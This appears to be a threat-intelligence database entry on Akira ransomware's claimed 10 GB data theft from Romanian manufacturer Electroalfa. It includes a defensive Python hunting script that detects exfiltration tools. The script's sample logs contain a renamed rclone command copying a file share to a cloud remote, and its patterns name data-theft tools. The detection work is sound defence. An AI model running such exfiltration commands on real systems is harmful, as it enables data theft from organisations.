Electroalfa Hit by Akira Ransomware: 10GB Data Stolen

Incident Date: Jul 24, 2024

Attack Overview
VICTIM
Electroalfa
INDUSTRY
Manufacturing
LOCATION
Romania
ATTACKER
Akira
FIRST REPORTED
July 24, 2024

Ransomware Attack on Electroalfa by Akira Group

Overview of Electroalfa

Electroalfa, a prominent Romanian company, operates in the manufacturing sector with a specialization in electrical engineering. The company is divided into three primary business units: Electrical Equipment, Steel Fabricated Parts, and EPC (Engineering, Procurement, and Construction) Contractor services. Electroalfa is known for its commitment to quality and innovation, which has established it as a significant player in the industry. The company employs a substantial workforce and has multiple factories and sales branches, although specific figures are not disclosed.

Details of the Attack

Electroalfa was added to the Akira ransomware group's leak site on July 24, 2024. The group claims to have exfiltrated roughly 10 GB of data, including project information, client details, and personal information of employees. As with most Akira postings, the claim originates from the attackers themselves and had not been independently confirmed at the time of writing; neither the initial access vector nor whether systems were also encrypted has been made public.

About the Akira Ransomware Group

Akira is a rapidly growing ransomware family that first emerged in March 2023. The group targets small to medium-sized businesses across various sectors, including manufacturing, government, technology, and more. Akira is believed to be affiliated with the now-defunct Conti ransomware gang, sharing similarities in their code. The group employs double extortion tactics, stealing data before encrypting systems and demanding a ransom for both decryption and data deletion. Their ransom demands typically range from $200,000 to over $4 million.

Distinguishing Features of Akira

Akira's dark web leak site features a retro 1980s-style green-on-black interface in which victims navigate by typing commands. The group's typical intrusion chain is initial access through remote-access services, most often VPN accounts with stolen credentials and no multi-factor authentication, followed by credential theft and lateral movement before the ransomware is deployed. Data is staged and exfiltrated with commodity transfer tools such as RClone, FileZilla, and WinSCP, which blend in with legitimate administrative activity and are therefore worth hunting for explicitly. In some cases Akira has deployed a previously unreported backdoor. As of January 2024, Akira had claimed over 250 victims and approximately $42 million in ransomware proceeds.
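Because the exfiltration tooling named above is legitimate software, a name-based block list is easy to sidestep by renaming the binary. The following added example (not Halcyon's code and not derived from the Electroalfa incident) hunts process-creation telemetry for RClone, WinSCP, and FileZilla by PE OriginalFileName, which survives a rename on disk, and adds command-line heuristics for an rclone transfer to a remote. The log records, host names, users, and the key=value layout are all constructed for the example; adapt the parser to your own Sysmon or EDR export.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed Windows process-creation records (Sysmon Event ID 1 style, flattened to
# key=value). "original" is the PE OriginalFileName, which survives a rename on disk.
SAMPLE_EVENTS = [
    r'ts=2024-07-20T01:12:03Z host=FS01 user=CORP\svc_backup image=C:\Windows\System32\svchost.exe cmd="svchost.exe -k netsvcs" original=svchost.exe',
    r'ts=2024-07-20T01:14:11Z host=FS01 user=CORP\jdoe image=C:\Users\Public\update.exe cmd="update.exe copy \\FS01\projects mega:dump --transfers 32 --config C:\Users\Public\r.conf" original=rclone.exe',
    r'ts=2024-07-20T01:20:45Z host=WS22 user=CORP\jdoe image="C:\Program Files (x86)\WinSCP\WinSCP.exe" cmd="WinSCP.exe /script=C:\Temp\put.txt" original=winscp.exe',
    r'ts=2024-07-20T02:00:00Z host=WS22 user=CORP\asmith image="C:\Program Files\FileZilla FTP Client\filezilla.exe" cmd="filezilla.exe" original=FileZilla.exe',
    r'ts=2024-07-20T02:05:00Z host=WS22 user=CORP\asmith image=C:\Windows\explorer.exe cmd="explorer.exe" original=explorer.exe',
]

# Transfer tools reported in Akira intrusions, keyed by lower-cased OriginalFileName.
EXFIL_TOOLS = {"rclone.exe": "rclone", "winscp.exe": "winscp", "filezilla.exe": "filezilla"}

# rclone transfer syntax: a verb followed somewhere by a "<remote>:<path>" destination.
# The remote name must be at least two characters so a Windows drive letter does not match.
RCLONE_CMD = re.compile(r"\b(copy|sync|move|copyto)\b.*\s\w{2,}:\S*", re.IGNORECASE)

# key=value tokens; a quoted value may contain spaces.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Finding:
    host: str
    user: str
    tool: str
    renamed: bool
    reasons: list


def parse_event(line):
    """Flatten one key=value record into a dict."""
    return {k: (q if q else b) for k, q, b in KV.findall(line)}


def classify(event):
    """Return a Finding if the process is a known exfil tool, else None."""
    original = event.get("original", "").lower()
    image_name = PureWindowsPath(event.get("image", "")).name.lower()
    tool = EXFIL_TOOLS.get(original) or EXFIL_TOOLS.get(image_name)
    if tool is None:
        return None
    reasons = [f"OriginalFileName={original}"]
    # Match on the PE name but flag when the on-disk name differs: a renamed copy of
    # rclone in a user-writable directory is far more suspicious than an installed client.
    renamed = original in EXFIL_TOOLS and image_name != original
    if renamed:
        reasons.append(f"binary renamed on disk to {image_name}")
    cmd = event.get("cmd", "")
    if tool == "rclone" and RCLONE_CMD.search(cmd):
        reasons.append("rclone transfer to a remote in the command line")
    if "--config" in cmd:
        reasons.append("explicit rclone config file (attacker-dropped remote definition)")
    return Finding(event.get("host", "?"), event.get("user", "?"), tool, renamed, reasons)


def hunt(lines):
    """Run the rule over a batch of records; returns Findings in log order."""
    out = []
    for line in lines:
        finding = classify(parse_event(line))
        if finding:
            out.append(finding)
    return out


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        flag = "RENAMED " if f.renamed else ""
        print(f"{f.host} {f.user}: {flag}{f.tool} -> {'; '.join(f.reasons)}")
```

On the constructed sample the rule raises three findings: the renamed rclone copy on FS01 (the highest-value hit, since it also carries a transfer verb, a cloud remote and an explicit config file), the scripted WinSCP session, and an interactive FileZilla launch. The last two may be legitimate, so in practice pair the rule with context such as the executing user, the time of day, and outbound byte counts from the firewall or proxy before paging anyone.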

Potential Vulnerabilities and Penetration Methods

No technical details of the intrusion at Electroalfa have been published, so the initial access vector is unknown. Given Akira's documented tradecraft, the most probable path is abuse of remote-access infrastructure, typically a VPN account with stolen or weak credentials and no multi-factor authentication, followed by credential harvesting and lateral movement to the file servers holding the project, client, and HR data that was taken. Organizations with a similar profile should enforce MFA on every remote-access path, alert on the transfer tools Akira favours (RClone, FileZilla, WinSCP) and on unusual outbound data volumes, train staff to recognise credential phishing, and maintain tested offline backups so that encryption alone cannot force a payment.

Disclaimer

The Halcyon Attacks Lookout Database is compiled using publicly available information based on the hosting choices of real-world threat actors and data from a variety of trackers. This information is provided in accordance with principles of fair use. Halcyon has made reasonable efforts to sanitize and verify the data; however, we do not guarantee the accuracy, completeness, or reliability of the information provided. Updates to the database are made as new source data becomes available from reputable sources. By accessing, viewing, or using the information within the Halcyon Attacks Lookout Database, you acknowledge and agree to do so entirely at your own risk. No reliance should be placed upon the information for decision-making, and Halcyon disclaims all liability for any inaccuracies or omissions in the data.